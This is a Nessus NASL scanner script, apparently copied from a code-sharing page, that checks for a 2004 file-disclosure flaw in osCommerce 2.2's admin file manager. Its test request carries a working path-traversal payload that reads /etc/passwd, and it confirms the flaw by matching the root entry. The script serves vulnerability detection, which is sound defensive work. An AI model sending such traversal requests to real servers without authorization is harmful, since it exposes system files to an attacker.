📄 oscommerce_file_manager_disclosure.nasl
字号:
## This script was written by Noam Rathaus## GPLv2## From: Rene <l0om@excluded.org># Subject: oscommerce 2.2 file_manager.php file browsing# Date: 17.5.2004 22:37if(description){ script_id(12242); script_version ("$Revision: 38 $"); script_cve_id("CAN-2004-2021"); script_bugtraq_id(10364); if (defined_func("script_xref")) { script_xref(name:"OSVDB", value:"6308"); } name["english"] = "File Disclosure in osCommerce's File Manager"; script_name(english:name["english"]); desc["english"] = "There is a vulnerability in the osCommerce's File Managerthat allows an attacker to retrieve arbitrary filesfrom the webserver that reside outside the bounding HTML rootdirectory. Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Detect osCommerce's File Manager File Disclosure"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2004 Noam Rathaus"); family["english"] = "General"; script_family(english:family["english"]); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); exit(0);}include("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if (! port) exit(0);if(!get_port_state(port)) exit(0);function check_dir(path){ req = http_get(item:string(path, "/admin/file_manager.php?action=download&filename=../../../../../../../../etc/passwd"), port:port); res = http_keepalive_send_recv(port:port, data:req); if ( res == NULL ) exit(0); if(egrep(pattern:".*root:.*:0:[01]:.*", string:res)) { security_warning(port); exit(0); }}foreach dir ( cgi_dirs() ) check_dir(path:dir);
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -